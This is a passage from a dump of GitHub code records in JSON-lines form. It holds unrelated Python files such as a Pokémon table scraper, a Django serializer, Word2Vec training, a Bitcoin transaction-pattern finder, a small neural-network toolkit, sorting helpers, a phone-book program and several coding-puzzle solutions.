4]))\n","repo_name":"Shiv2157k/leet_code","sub_path":"goldman_sachs/median_in_two_sorted_array.py","file_name":"median_in_two_sorted_array.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"12722853641","text":"# this part scrapes the correct table from wiki\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nurl = \"https://en.wikipedia.org/wiki/List_of_Pok%C3%A9mon\"\n\nresponse = requests.get(url)\nhtml_content = response.content\n\nsoup = BeautifulSoup(html_content, \"html.parser\")\n\ntables = soup.find_all(\"table\", {\"class\": \"wikitable\"})\n# select 3rd table on page, 3rd row, every other td and makes into str\ngeneration_table = tables[2]\ngeneration_row = generation_table.find_all(\"tr\")[2]\nbreak_points = [int(td.string) for td in generation_row.find_all(\"td\")[::2]]\n\nimport csv\n\noriginal_file_path = \"./pokemon_list.csv\"\nwith open(original_file_path, \"r\") as original_file:\n csv_reader = csv.reader(original_file)\n \n current_break = 0 # Index for the break_points list\n current_file_number = 1\n output_file_path = f\"generation{current_file_number}.csv\"\n\n output_file = open(output_file_path, \"w\", newline=\"\")\n csv_writer = csv.writer(output_file)\n \n # Loop through the original file and write rows to smaller files\n for index, row in enumerate(csv_reader, start=1):\n csv_writer.writerow(row)\n \n if index == break_points[current_break]:\n current_break += 1\n current_file_number += 1\n \n output_file.close()\n \n output_file_path = f\"generation{current_file_number}.csv\"\n output_file = open(output_file_path, \"w\", newline=\"\")\n csv_writer = csv.writer(output_file)\n \n 
output_file.close()","repo_name":"DorotaBjoorn/Data-Engineering-Dorota-Bjoorn","sub_path":"excercises/Ex02_docker_compose/src/generations_to_csv.py","file_name":"generations_to_csv.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"73793170993","text":"\"\"\"\nserializer details class for Contract model\n@create : function for adding author id at creation\n@author : Sylvain GAUTHIER\n@version : 1.0\n\"\"\"\n\nfrom rest_framework.serializers import SerializerMethodField\nfrom rest_framework import serializers\n\nfrom .contractbaseserializer import ContractBaseSerializer\nfrom crmapi.serializers.event_serializers.eventlistserializer import \\\n EventListSerializer\nfrom crmapi.serializers.client_serializers.clientlistserializer import \\\n ClientListSerializer\n\nfrom crmapi.models.contract import Contract\nfrom crmapi.models.client import Client\nfrom crmapi.models.event import Event\n\n\nclass ContractDetailSerializer(ContractBaseSerializer):\n id = serializers.ReadOnlyField()\n event = SerializerMethodField()\n client = SerializerMethodField()\n\n class Meta:\n model = Contract\n fields = [\n 'id',\n 'client',\n 'date_created',\n 'date_updated',\n 'status',\n 'event',\n 'amount',\n 'payment_due'\n ]\n\n def get_event(self, instance):\n if instance.event:\n queryset = Event.objects.filter(pk=instance.event.id)\n serializer = EventListSerializer(queryset, many=True)\n return serializer.data\n\n def get_client(self, instance):\n if instance.client:\n queryset = Client.objects.filter(pk=instance.client.id)\n serializer = ClientListSerializer(queryset, many=True)\n return serializer.data\n","repo_name":"SGauthier2Pro/P12_CRM_Epic_Events_API","sub_path":"crmepicevents/crmapi/serializers/contract_serializers/contractdetailserializer.py","file_name":"contractdetailserializer.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29922740455","text":"#!/usr/bin/env python\ndef eggs(someEggs) :\n\tsomeEggs.append('spam')\n\nspam = ['bacon','sausage','egg']\nprint(spam)\neggs(spam)\nprint(spam)\n\n# even though 'someEggs' is destroyed after the function ends for not being a global variable\n# it's only receiving the reference to the list 'spam', not the actual value.\n# what was append in to the memory, which will reflect to the same result 'spam' is referring\n# 'spam' and 'someEggs' are mutable, their value is stored in memory\n# a string for instance is immutable, its value must be reassigned in place\n","repo_name":"tgmrks/python-samples","sub_path":"multable_immutable_values.py","file_name":"multable_immutable_values.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"46625752160","text":"from distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\next_modules = [Extension('Exact_Integration',\n ['Exact_Integration.pyx'],\n )]\nsetup(\n name='Exact_Integration',\n cmdclass={'build_ext': build_ext},\n ext_modules=ext_modules\n)\n#python setup.py build_ext -i clean\n","repo_name":"BinWang0213/PyBEM2D","sub_path":"PyBEM2D/BEM_Solver/Elements/deprecated/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"39"} 
+{"seq_id":"37489304198","text":"from functools import wraps\nfrom typing import List, Optional\n\nfrom npe2._pydantic_compat import Extra, Field\nfrom npe2.manifest.utils import Executable, v2_to_v1\nfrom npe2.types import ReaderFunction\n\n\nclass ReaderContribution(Executable[Optional[ReaderFunction]]):\n \"\"\"Contribute a file reader.\n\n Readers may be associated with specific **filename_patterns** (e.g. \"*.tif\",\n \"*.zip\") and are invoked whenever `viewer.open('some/path')` is used on the\n command line, or when a user opens a file in the graphical user interface by\n dropping a file into the canvas, or using `File -> Open...`\n \"\"\"\n\n command: str = Field(\n ..., description=\"Identifier of the command providing `napari_get_reader`.\"\n )\n filename_patterns: List[str] = Field(\n ...,\n description=\"List of filename patterns (for fnmatch) that this reader can \"\n \"accept. Reader will be tried only if `fnmatch(filename, pattern) == True`. \"\n \"Use `['*']` to match all filenames.\",\n )\n accepts_directories: bool = Field(\n False, description=\"Whether this reader accepts directories\"\n )\n\n class Config:\n extra = Extra.forbid\n\n def __hash__(self):\n return hash(\n (self.command, tuple(self.filename_patterns), self.accepts_directories)\n )\n\n def exec(self, *, kwargs):\n \"\"\"\n We are trying to simplify internal npe2 logic to always deal with a\n (list[str], bool) pair instead of Union[PathLike, Seq[Pathlike]]. We\n thus wrap the Reader Contributions to still give them the old api. Later\n on we could add a \"if manifest.version == 2\" or similar to not have this\n backward-compatibility logic for new plugins.\n \"\"\"\n kwargs = kwargs.copy()\n stack = kwargs.pop(\"stack\", None)\n assert stack is not None\n kwargs[\"path\"] = v2_to_v1(kwargs[\"path\"], stack)\n callable_ = super().exec(kwargs=kwargs)\n\n if callable_ is None: # pragma: no cover\n return None\n\n @wraps(callable_)\n def npe1_compat(paths, *, stack):\n path = v2_to_v1(paths, stack)\n return callable_(path)\n\n return npe1_compat\n","repo_name":"napari/npe2","sub_path":"src/npe2/manifest/contributions/_readers.py","file_name":"_readers.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"39"} +{"seq_id":"22844247643","text":"\nfrom modules.layout import layoutAnalysis\nfrom modules.lexical import lexicalAnalisys\nfrom modules.vectorizer import vectorizeFileInLines, vectorizeFile\n\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\n\nimport glob\nimport os\nimport sys\n\n\ndef printTestsPredicts(y_test, predictedAuthor):\n print(\"\\n\\nTests: \")\n erros = 0\n for a, b in zip(y_test, predictedAuthor):\n\n if a == b:\n print(f'{a} = {b}: V')\n if a != b:\n print(f'{a} != {b}: F')\n erros += 1\n\n print(f'Total: {len(y_test)}')\n print(f'Erros: {erros}')\n\nif os.name == \"posix\":\n filesPath = glob.glob(input(\"Type the path to the training files: \").replace(\"'\", \"\") + \"/*/*.cpp\")\n filesLabels = [path.split(\"/\")[-2] for path in filesPath]\n\nelif os.name == \"nt\":\n filesPath = glob.glob(input(\"Type the path to the training files: \").replace(\"'\", \"\") + \"\\*\\*.cpp\")\n filesLabels = [path.split(\"\\\\\")[-2] for path in filesPath]\n\n# vectorizeFileInLines vectorizes files and separates the lines so each file is represented as list[str] so the total set is 
list(vectorizedFilesInLines)[list(each file)[str(each line)]]\nvectorizedFilesInLines = [vectorizeFileInLines(path) for path in filesPath]\n# vectorizeFile vectorizes files and each file is represented as str so the total set is list(vectorizedFilesWhole)[str(each file)]\nvectorizedFilesWhole = [vectorizeFile(path) for path in filesPath]\n\n# this generates the data sets for each type of analysis\nfilesLayoutData = layoutAnalysis(vectorizedFilesInLines)\nfilesLexicalData = lexicalAnalisys(vectorizedFilesWhole)\n\n# this sums the two data sets so each file is represented as a list of features\nfilesData = np.concatenate((filesLayoutData, filesLexicalData), axis=1)\nprint(filesData[0])\n\nx_train, x_test, y_train, y_test = train_test_split(filesData, filesLabels, test_size=0.3)\n\n# Geração do modelo por processo de machine learning com os dados dos arquivos conhecidos\nknn = KNeighborsClassifier(metric=\"cityblock\", n_neighbors=1, algorithm=\"brute\")\nknn.fit(x_train, y_train)\n\n\n\n# Previsão sobre de quem o arquivo misterioso é\npredictedAuthor = knn.predict(x_test)\n\n# Calculo da precisão do modelo\nprint(f'Accuracy: {accuracy_score(y_test, predictedAuthor) * 100}')\n\nif \"-v\" in sys.argv:\n printTestsPredicts(y_test, predictedAuthor)\n","repo_name":"Jbernardiss/codeStylometryResearch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"26903602749","text":"import gensim\nfrom typing import Iterator, List\nimport os\n\n# Absolute path\nABSOLUTE_PATH = f\"{os.getcwd()}/\"\n\n# The location of our training data RELATIVE to this python file\nTRAINING_DATA = \"../wikipedia_scraping/output_data/scrape_output.txt\"\n\n# Method to read in our training data\ndef read_input(input_file:str) -> Iterator[List[str]]:\n with open(input_file, 'r') as f: # do gzip.open for gzipped files\n for i, line in enumerate(f):\n # do some pre-processing and return list of words for each review\n # text\n if (i % 1000 == 0):\n print(f\"Processed {i} lines\")\n\n tokenized_line = gensim.utils.simple_preprocess(line)\n yield tokenized_line\n\n\nif __name__ == '__main__':\n\n # Get the full path of our training data file\n data_file = os.path.join(ABSOLUTE_PATH, TRAINING_DATA)\n\n # Get our tokenized input into a list\n # Every line has become a list of words\n # So this is a two dimensional matrix\n documents = list(read_input(data_file))\n\n\n print(\"Building vocabulary in Word2Vec model...\")\n \n # Build the model's vocabulary\n model = gensim.models.Word2Vec(\n documents,\n vector_size=125,\n window=10,\n min_count=2,\n workers=10)\n\n print(\"Training Word2Vec model...\")\n # Train the model\n model.train(documents, total_examples=len(documents), epochs=15)\n\n # Save the model\n model.save(os.path.join(ABSOLUTE_PATH, \"saved_models/my_model\"))\n\n # Save the vectors\n model.wv.save(os.path.join(ABSOLUTE_PATH, \"saved_vectors/my_vectors\"))\n\n # Report that we've finished training\n print(\"\\n FINISHED TRAINING! 
\\n\")\n print(f\"Model's total vocabulary: {len(model.wv.key_to_index)}\")\n","repo_name":"smallblue2/Word2Vec-with-Wikipedia","sub_path":"word2vec/train_word2vec.py","file_name":"train_word2vec.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"14247241522","text":"import tools\nimport re\nfrom time import sleep\n\n# import blocksci\n\nmysql = tools.connect_mysql()\nrpc = tools.connect_prc()\npattern = re.compile(r' OP_CHECKSIGVERIFY OP_IF .* OP_CHECKSIG OP_ELSE .* (OP_EQUAL.*OP_SWAP.*OP_BOOLOR|OP_EQUALVERIFY.*OP_EQUAL.*) .* OP_ENDIF')\n\nwith mysql.cursor() as cursor:\n cursor.execute(\"SELECT COUNT(*) FROM fair_exchange;\")\n result = cursor.fetchall()\n num = result[0]['COUNT(*)']\n\nf = open(\"fe_asm.txt\", \"w\")\nf2 = open(\"fe_out_asm.txt\", \"w\")\ncounter = 0\nfor n in range(0, num, 1000):\n with mysql.cursor() as cursor:\n cursor.execute(\"SELECT * FROM fair_exchange LIMIT %d, 1000;\" % n)\n txs = cursor.fetchall()\n\n for i in range(len(txs)):\n tx = txs[i]\n height = tx['height']\n print(\"\\rCurrent height: %d\" % height, end=\"\", flush=True)\n tx = rpc.getrawtransaction(tx['txid'], True)\n ins = tx['vin']\n outs = tx['vout']\n\n skip = 0\n # skip all txes that contain \"op_return\"\n for tx_output in outs:\n script = tx_output['scriptPubKey']\n if script['type'] == \"nulldata\":\n skip = 1\n break\n elif re.search(pattern, tx_output['scriptPubKey']['asm']) is not None:\n f2.write(\"%s: %s\\n\"%(tx['txid'], tx_output['scriptPubKey']['asm']))\n\n if skip == 1:\n continue\n\n for i in range(len(ins)):\n tx_input = ins[i]\n asm_list = tx_input['scriptSig']['asm'].split(' ')\n if len(asm_list[-1]) % 2 != 0 or re.search('[^0-9a-f]+', asm_list[-1]) is not None:\n continue\n asm = rpc.decodescript(asm_list[-1])['asm']\n if re.search(pattern, tx_output['scriptPubKey']['asm']) is not None:\n f.write(\"%s: %s\\n\"%(tx['txid'], asm))\n\n # with mysql.cursor() as cursor:\n # cursor.execute(\n # \"INSERT INTO btc_transactions.pruned_multisig_strict (`id`, `txid`, `height`) VALUES (%s, '%s', %s, '%s', '%s')\" % (\n # counter, tx['txid'], height))\n # counter += 1\n\n # mysql.commit()\n\nf.close()\nf2.close()\nmysql.close()\n","repo_name":"yongjian-hu/btc_mixing_detection","sub_path":"finder/prune_fe.py","file_name":"prune_fe.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29164055635","text":"\"\"\"\nGiven an array perm[] of size N denoting a number. Find its next permutation. ie- rearrange the digits into the lexicographically next greater permutation. 
If such arrangement is not possible, it must be rearranged as the lowest possible order ie, sorted in an ascending order.\n\n\nExample 1:\n\nInput:\nN = 6\nperm[] = {1, 2, 3, 6, 5, 4}\nOutput: 1 2 4 3 5 6\nExplanation: 124356 > 123654 and is the \nlexicographically next permutation.\n\nExample 2:\n\nInput:\nN = 4\nperm[] = {4, 3, 2, 1}\nOutput: 1 2 3 4\nExplanation: Since 4321 can not be rearranged\nto produce a bigger number, it is rearranged \nis ascending order.\n\n\"\"\"\n\n\nclass Solution:\n def nextPermutation(self,perm,N):\n idx=0\n for i in range(N-1)[::-1]:\n if perm[i]= (CONF_THRESHOLD / 100)]\n\nprint(f\"Processing {len(given_conf_sections)} sections at {CONF_THRESHOLD}% confidence for config {sys.argv[-2]}...\")\n\nif DRY_RUN:\n exit()\n\nif not os.path.exists(HIGH_CONF_DIR):\n os.mkdir(HIGH_CONF_DIR)\n\nqj.save_file(\n f\"{HIGH_CONF_DIR}/confidences_{RUN_NAME}_{version_name}.json\",\n confidences\n)\nqj.save_file(\n f\"{HIGH_CONF_DIR}/expert_review.json\",\n {s : \"waiting_for_review\" for s in given_conf_sections}\n)\n\n\nfor section_name in given_conf_sections:\n\n print(f\"Saving for section {section_name} with confidence {confidences[section_name]:0.4f}...\")\n\n if PRE_PROC_TYPE != \"raw\":\n blue_adjusted = io.imread(f\"{ADJUSTED_DIR}/{section_name}_1_{PRE_PROC_TYPE}.png\")\n green_adjusted = io.imread(f\"{ADJUSTED_DIR}/{section_name}_2_{PRE_PROC_TYPE}.png\")\n else:\n blue_adjusted = io.imread(f\"{DATA_DIR}/{section_name}_1_{PRE_PROC_TYPE}.png\")\n green_adjusted = io.imread(f\"{DATA_DIR}/{section_name}_2_{PRE_PROC_TYPE}.png\")\n\n ground_truth = io.imread(f\"{PREDICTIONS_DIR}/pred_{section_name}.png\")\n\n # height, width = ground_truth.shape[:2]\n\n blue = np.dstack((blue_adjusted, blue_adjusted, blue_adjusted))\n green = np.dstack((green_adjusted, green_adjusted, green_adjusted))\n\n tif.imwrite(f\"{HIGH_CONF_DIR}/{section_name}.tif\", blue, compress=6, append=True)\n tif.imwrite(f\"{HIGH_CONF_DIR}/{section_name}.tif\", green, compress=6, append=True)\n tif.imwrite(f\"{HIGH_CONF_DIR}/{section_name}.tif\", ground_truth, compress=6, append=True)\n\n\nprint(\"Done.\")\n","repo_name":"nervecenter/bsp-experiment","sub_path":"choose_threshold_sections.py","file_name":"choose_threshold_sections.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"42234674171","text":"import pandas as pd\nfrom matplotlib import pyplot as plt\n\n\nleaderboard = [\n 'Atelectasis', 'Cardiomegaly', 'Consolidation', 'Edema', 'Pleural Effusion']\n\n\ndef make_plot(fp_csv_in, fp_img_out):\n df = pd.read_csv(fp_csv_in)\n # add a * for leaderboard classes\n df.columns = [x+(\"*\" if x in leaderboard else \"\") for x in df.columns]\n z = df[df.columns[-14:]].melt(var_name='Diagnostic Class')\n z[\"count\"] = 1\n z = (z\n .replace(-1,2) # set uncertain values as 2\n .fillna(-2) # set missing values as -2\n .groupby([\"Diagnostic Class\", \"value\"]).count().unstack(\"value\") # [[(\"count\", 0.0), (\"count\", 1.0)]\n .droplevel(None, axis=1))\n cols = {-2: '- (Missing)', 0: '-', 1: '+', 2: 'Uncertain'}\n z.columns = [cols[k] for k in z.columns]\n fig, ax = plt.subplots(figsize=(5.2,3))\n z.plot.barh(stacked=True, ax=ax)\n ax.legend(loc='lower left')\n plt.tight_layout()\n plt.savefig(fp_img_out, bbox_inches='tight')\n print(fp_img_out)\n\n\nmake_plot(\n './data/CheXpert-v1.0-small/train.csv',\n './results/plots/chexpert_class_distribution_TRAIN.png')\nmake_plot(\n 
'./data/CheXpert-v1.0-small/valid.csv',\n './results/plots/chexpert_class_distribution_TEST.png')\n","repo_name":"adgaudio/DeepFixCX","sub_path":"bin/plot_chexpert_class_distribution.py","file_name":"plot_chexpert_class_distribution.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"5913664712","text":"class Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n total = 0\n visited = defaultdict(int)\n count = 0\n visited[0] = 1\n \n for val in nums:\n total += val\n count += visited.get(total - k,0)\n visited[total] += 1 \n \n return count\n ","repo_name":"Misganaw-Berihun/LeetCode","sub_path":"560-subarray-sum-equals-k/560-subarray-sum-equals-k.py","file_name":"560-subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1125991957","text":"\"\"\"The prime factors of 13195 are 5, 7, 13 and 29.\n\nWhat is the largest prime factor of the number 600851475143\"\"\"\n\n#the number they gave is too big too simply brute force\n#b/c listing all numbers from 1 to 600851475143 causes overflow\n\nimport math\nfrom datetime import datetime\n\nstartTime = datetime.now() #to measure speed\n\n\nn = 600851475143\n# if I wanted to make this interactive \n# n = int(input(\"What positive integer do you want the prime factorization of?\"))\nfactors = []\nnotprimefactors = []\nprimefactors = []\n\n#for every factor of n under the sqrt(n), there is one\n#factors of n over the sqrt(n)\n#we take advantage of this fact in the below function\n\n\n#this gets every factor\ndef factorization(p):\n for divisors in range(2,math.floor(math.sqrt(n))+1):\n if p % divisors == 0:\n factors.append(int(divisors))\n factors.append(int(p / divisors))\n\n#this gets every nonprime factor\ndef getnonprimes():\n for notprime in factors:\n for ints in range(2,math.floor(math.sqrt(notprime))):\n if notprime % ints == 0:\n notprimefactors.append(notprime)\n\n#every element of factor that is NOT in notprimefactors\n#gets added to primefactors\ndef getprimes():\n for primes in factors:\n if primes not in notprimefactors:\n primefactors.append(primes)\n \nfactorization(n)\ngetnonprimes()\ngetprimes()\n\nif primefactors == []:\n print(n)\nelse:\n print(max(primefactors))\n\nprint(datetime.now()-startTime)\n","repo_name":"choandrew/Project-Euler-with-Python","sub_path":"Project Euler 3 general.py","file_name":"Project Euler 3 general.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39161271006","text":"\"\"\"\nCircuit Python machine learning tool kit\n\nThis library combines and provides functionality relevant to making neural networks on devices.\n\nLibrary by Dexter R. 
Shepherd\nUniversity of Sussex PhD student\n\n\"\"\"\n\nimport ulab.numpy as np\nimport random\nimport math as maths\n\n\"\"\"\ngenerate a normal distribution randomized\n@param: Mean is the mean of the normal\n@param: StdDev is the standard deviation of the normal\n@param: size is the shape of the matrix\n\"\"\"\ndef normal(mean=0,std=0.5,size=[5]):\n num=1\n for i in size:\n num*=i\n ar=np.zeros(size)\n ar=ar.flatten() #generate numpy\n secondary=np.zeros(num*10)\n for i in range(0,num*10 -1,2):\n X=maths.sqrt(abs(-2 * maths.log(i+1/num))) * maths.cos(2*maths.pi * i+1/num)\n #Y=maths.sqrt(abs(-2 * maths.log(i+1/num))) * maths.sin(2*maths.pi * i+1/num)\n X_ = mean + std * X\n X_n = mean - std * X\n #Y_ = mean + std * Y\n secondary[i]=X_\n secondary[i+1]=X_n\n for i in range(num): #select only from the random variables\n ar[i]=secondary[random.randint(0,num*10 -1)]\n return ar.reshape(size)\n\n\"\"\"\nget the mean squared error\n@param: y the truth data\n@param: y_pred the model predictions\n\"\"\"\ndef MSE(y,y_pred):\n s=y - y_pred\n d=s**2\n mse = np.mean(d)\n return mse\n\n\"\"\"\ngenerate a layer to hold information on network\n@param: nodes_in is the number of inputs to this layer\n@param: nodes_out is the number of nodes in the next layer\n@param: vals is whether the user wishes to manually set the weights\n\"\"\"\nclass Layer:\n def __init__(self,nodes_in,nodes_out,vals=None,activ=None):\n if type(vals)==type(None):\n self.matrix=normal(size=(nodes_out,nodes_in)) #generate random weights\n else:\n self.matrix=vals.reshape((nodes_out,nodes_in)) #generate set weights\n self.vals=vals\n self.bias=None\n self.activation_func=activ\n if type(activ)==type(None):\n self.activation_func=self.activation_\n self.a = 0 # defines the output of the layer after running through activation\n self.z = 0 # defines the input of layer to the activation function\n def getShape(self): #return the shape of the matrix\n return self.matrix.shape\n def setBias(self,bias):\n self.bias=bias\n def activation_(self,inputs):\n #activation functions\n self.z=inputs\n self.a = 1/(1 + np.exp(-self.z))\n return self.a\n def activation_grad(self):\n return self.a * (1 - self.a)\n def T(self):\n return self.matrix.transpose()\n def setWeight(self,val):\n val=np.array(val)\n val=val.reshape(self.getShape())\n self.matrix=val\n\n\"\"\"\nThe network that combines all the layers together\n@param: num_out is how many nodes in the output layer\n\"\"\"\nclass Network:\n def __init__(self,num_out):\n self.network=[]\n self.num_out=num_out\n \"\"\"\n Adds a layer to the network\n @param: nodes\n @param: vals\n @param: act\n \"\"\"\n def add_layer(self,nodes,vals=None,act=None):\n layer=Layer(nodes,self.num_out,vals=vals,activ=act) #default x by y\n if len(self.network)>0: #there are previous nodes\n layer=self.network[-1]\n bias=self.network[-1].bias\n activation=layer.activation_func\n num=layer.getShape()\n val=layer.vals\n layer=Layer(num[1],nodes,vals=val,activ=activation)\n layer.setBias(bias)\n self.network[-1]=layer #correct output of matrices before\n layer=Layer(nodes,self.num_out,vals=vals,activ=act) #generate layer with correct matrices\n self.network.append(layer) #add the layer to the network\n \"\"\"\n adds bias to the network\n @param: vals\n \"\"\"\n def add_bias(self,vals=None):\n assert len(self.network)>0, \"Network is empty. 
Add layers\"\n size=self.network[-1].getShape() #get the end sizing to add on\n if type(vals)==type(None):\n vals=normal(size=(size,1))\n self.network[-1].setBias(vals) #set the bias in the current end layer\n \"\"\"\n @param: inp\n @return: x\n \"\"\"\n def forward(self,inp):\n x=inp\n #self.network[0].a=x.copy()\n for i in range(len(self.network)):\n x=np.dot(self.network[i].matrix,x)\n if type(self.network[i].bias)!=type(None):\n x+=self.network[i].bias\n x=self.network[i].activation_func(x)\n self.network[i].a=x.copy()\n\n return x\n \"\"\"\n show all the network layers and biases\n \"\"\"\n def show(self):\n #show all the network layers and biases\n for i in range(len(self.network)):\n print(\"Layer\",i+1,\", nodes:\",self.network[i].getShape(),\", biases:\",self.network[i].bias)\n \"\"\"\n @param: inputData\n @param: y_data\n @param: epochs\n @param: learning_rate\n \"\"\"\n def train(self,inputData,y_data,epochs,learning_rate):\n #update all the weights via the MSE\n correct=0\n x,y=inputData.shape\n X_data=inputData.reshape((y,x))\n for epoch in range(epochs):\n correct=0\n #calculate loss\n preds=self.forward(X_data) #get forward pass\n loss = (preds-y_data.transpose())**2 #get loss\n loss= np.sum(np.sum(loss, axis=0)) #calculate overall loss\n\n #calculate gradients\n grad_h = 2.*(preds-y_data.transpose())\n for i in reversed(range(len(self.network))):\n grad_W=np.dot(grad_h,self.network[i-1].a.transpose())\n grad_h=np.dot(self.network[i].matrix.transpose(),grad_h)\n assert grad_W.shape==self.network[i].matrix.shape, \"matrix incorrect got \"+str(grad_W.shape)+\"but expected \"+str(self.network[2].matrix.shape)\n self.network[i].matrix-=1e-2 * grad_W * learning_rate#learning rate\n #calculate accuracy and display\n p=preds.transpose()\n for i in range(len(y_data)):\n c=0\n for k in range(len(y_data[i])):\n if round(p[i][k])==round(y_data[i][k]):\n c+=1\n if c==len(y_data[i]):\n correct+=1\n print(\"epoch\",epoch+1,\"Loss:\",loss,\"Accuracy:\",(correct/len(y_data))*100,\"%\")\n def trainGA(self,inputData,y_data,epochs,learning_rate,fitnessFunc=None):\n x,y=inputData.shape\n X_data=inputData.reshape((y,x))\n def fitness(y,pred): #default fitness function\n correct=0\n p=preds.transpose()\n for i in range(len(y)): #calculate how correct the prediction was\n c=0\n for k in range(len(y[i])):\n if round(p[i][k])==round(y[i][k]):\n c+=1\n if c==len(y[i]):\n correct+=1\n return correct/len(y)\n def mutate(matrix,rate): #mutate the matrix going in\n shap=matrix.shape\n flat1=matrix.flatten()\n new=normal(mean=0,std=1,size=flat1.shape) #add noise\n for i in range(len(flat1)):\n if random.random() arr[j + 1]:\n swap = True\n print(f'swap {arr[j]} and {arr[j+1]}')\n temp = arr[j]\n arr[j] = arr[j + 1]\n arr[j + 1] = temp\n else:\n print('no swap')\n\n print(' '.join([str(i) for i in range(n)]))\n print(' '.join([str(a) for a in arr]))\n if not swap:\n print('DONE EARLY')\n break\n\n return arr\n \ndef insertion(arr):\n n = len(arr)\n for i in range(n):\n for j in range(i):\n if arr[i - j] < arr[i - j - 1]:\n temp = arr[i - j]\n arr[i - j] = arr[i - j - 1]\n arr[i - j - 1] = temp\n else:\n break\n\n return arr\n \n\n# simple binary search\ndef binarySearch(arr, v):\n n = len(arr)\n\n if n == 0:\n return False\n if n == 1:\n return arr[0] == v\n\n return binarySearch(arr[:n//2], v) or binarySearch(arr[n//2:], v)\n\n \n\n# binary search with index return\ndef binarySearch2(arr, v, index=0):\n n = len(arr)\n\n if n == 0:\n return math.inf\n if n == 1:\n if arr[0] == v:\n return index\n else:\n 
return math.inf\n\n    left = binarySearch2(arr[:n//2], v, index) # returns n in range(-1, n)\n    right = binarySearch2(arr[n//2:], v, index + n//2) # returns n in range(-1, n)\n\n    return min(left, right)\n\n\n# now what?\n# binary insertion sort\n# binary search the virtual list\n# \n","repo_name":"Brandon-Spicer/getSorted","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31122808571","text":"# Exercise 16: Write a phone book management program as follows:\n# 1. The user chooses option 1: view the phone book (print 2 columns: phone number and name)\n# 2. The user chooses option 2: update a name via the phone number\n# 3. The user chooses option 3: add a new phone number to the phone book\n# 4. The user chooses option 4: delete a contact from the phone book \n# 5. The user searches for a phone number by name\n# 6. If the user chooses anything other than the options above, report an invalid option and exit the program.\n# Initial data: danh_ba={ '0989741258':'Johnny','0903852147':'Katherine','0903712712':'Johnny'}\ndanh_ba={ '0989741258':'Johnny','0903852147':'Katherine','0903712712':'Johnny'}\nprint(danh_ba)\nprint(type(danh_ba))\nprint(danh_ba.items())\nprint(type(danh_ba.items()))\nwhile True:\n    print(\"1: view the phone book\")\n    print(\"2: update a name via the phone number\")\n    print(\"3: add a new phone number to the phone book\")\n    print(\"4: delete a contact from the phone book\")\n    print(\"5: search for a phone number by name\")\n    _tacvu=input(\"Enter the option to perform\")\n    if _tacvu==\"1\":\n        print(\"{:15}{:15}\".format(\"Phone\",\"Name\"))\n        for k,v in danh_ba.items():\n            print(\"{:15}{:15}\".format(k,v))\n    elif _tacvu==\"2\":\n        sdt=input(\"Enter the phone number to find\")\n        if sdt in danh_ba:\n            # the dict treats the variable sdt as its key - that is the convention\n            ten=input(\"Enter the name to set\")\n            danh_ba[sdt]=ten\n        else:\n            print(\"The phone number does not exist\")\n    elif _tacvu==\"3\":\n        # pass\n        sdt=input(\"Enter the phone number to add\")\n        if sdt not in danh_ba:\n            # the dict appends the new entry at the end if the key does not exist yet\n            ten=input(\"Enter the name\")\n            danh_ba[sdt]=ten\n        else:\n            print(\"The phone number already exists, please update it with option 2\")\n    elif _tacvu==\"4\":\n        # pass\n        sdt=input(\"Enter the phone number to find\")\n        if sdt in danh_ba:\n            del(danh_ba[sdt])\n            print(\"Deleted successfully\")\n        else:\n            print(\"The phone number does not exist in the phone book\")\n    elif _tacvu==\"5\":\n        ten=input(\"Enter the name to find\")\n        _ketqua={}\n        for k,v in danh_ba.items():\n            if ten.upper()==v.upper():\n                _ketqua[k]=v\n        if len(_ketqua)>0:\n            print(\"{:15}{:15}\".format(\"Phone\",\"Name\"))\n            for k,v in _ketqua.items():\n                print(\"{:15}{:15}\".format(k,v))\n        else:\n            print(\"Not found in the phone book\")\n    else:\n        print(\"Stopping the program\")\n        break","repo_name":"jamesle1308/python001","sub_path":"Week3/dict_bt16.py","file_name":"dict_bt16.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36532923118","text":"from rest_framework.permissions import BasePermission\nfrom .models import Message\n\nclass IsOwner(BasePermission):\n    